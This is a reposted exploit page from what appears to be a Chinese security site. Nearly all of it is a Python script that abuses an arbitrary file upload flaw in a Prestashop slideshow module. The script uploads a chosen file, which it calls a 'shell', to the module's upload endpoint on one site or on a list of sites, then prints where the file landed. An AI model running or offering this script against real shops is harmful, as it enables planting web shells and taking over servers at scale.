Prestashop vtermslidesshow module Arbitrary File Upload Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Prestashop vtermslidesshow module Arbitrary File Upload Exploit

来源：pentesterdesk@gmail.com 作者：PentesterDesk 发布时间：2016-07-13

#!/usr/bin/python

####################################################################################

#Author : PentesterDesk

#Date : 10-July-2016

#Software: Prestashop CMS

#vuln Mod: vtermslidesshow

#Greetz to all indian hackers and special thanks to Muhammad Faisal

####################################################################################

import sys, os

import requests

def main():

os.system('cls' and 'color -a' if os.name == "nt" else 'clear')

banner = '''

+======================================================+

| Prestashop | FileUpload Exp | PentesterDesk |

| Coded by : PentesterDesk Team |

| Contact : pentesterdesk@gmail.com |

+======================================================+

'''

print banner

#/modules/vtermslidesshow/

os.system('cls' and 'color -a' if os.name == "nt" else 'clear')

print banner

print "\n <==============[[VtermSlideShow Exploit]]==============>\n"

print "[1] Single Site "

print "[2] Mass Upload"

ch=raw_input("\n[>] ")

if ch == '1':

os.system('cls' and 'color -a' if os.name == "nt" else 'clear')

print banner

print "\n <==============[[VtermSlideShow Exploit]]==============>\n"

url = raw_input("[+] Enter Url : ")

filname= raw_input("[+] Enter File : ")

if filname == '' or url == '':

print "\n[!] Url or File is not entered\n"

raw_input("[+] Press Enter [>] ")

main()

url = url + "/modules/vtemslideshow/uploadimage.php"

#main

files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}

req=requests.post(url,files=files)

print(req.text)

final =[]

final = (req.text).split(":")

if req.status_code == 200 and filname in req.text:

url=url.replace('/uploadimage.php','/slides/'+final[1])

print ("[+] %s [ok]" % (url))

else:

print "\n[+] %s [No]\n" %url

raw_input("\n[+] Press Enter [>] ")

#mass

if ch == '2':

os.system('cls' and 'color -a' if os.name == "nt" else 'clear')

print banner

print "\n <==============[[VtermSlideShow Exploit]]==============>\n"

filee = raw_input("[+] Enter List Name : ")

filname= raw_input("[+] Enter Shell Name : ")

if filname == '' or filee == '':

print "\n[!] Url or File is not entered\n"

raw_input("[+] Press Enter [>] ")

main()

ob = open(filee,'r')

lists = ob.readlines()

list1 = []

i = 0

for i in range(len(lists)):

list1.append(lists[i].strip('\n'))

count = 0

for site in (list1):

count = count + 1

url = site + "modules/vtemslideshow/uploadimage.php"

files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}

req=requests.post(url,files=files)

final =[]

final = (req.text).split(":")

if req.status_code == 200 and filname in req.text:

url=url.replace('/uploadimage.php','/slides/'+final[1])

print ("[%d] %s [ ok ]" % (count,url))

else:

print ("[%d] %s [ No ]" % (count,url))

if __name__ == "__main__":

main()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告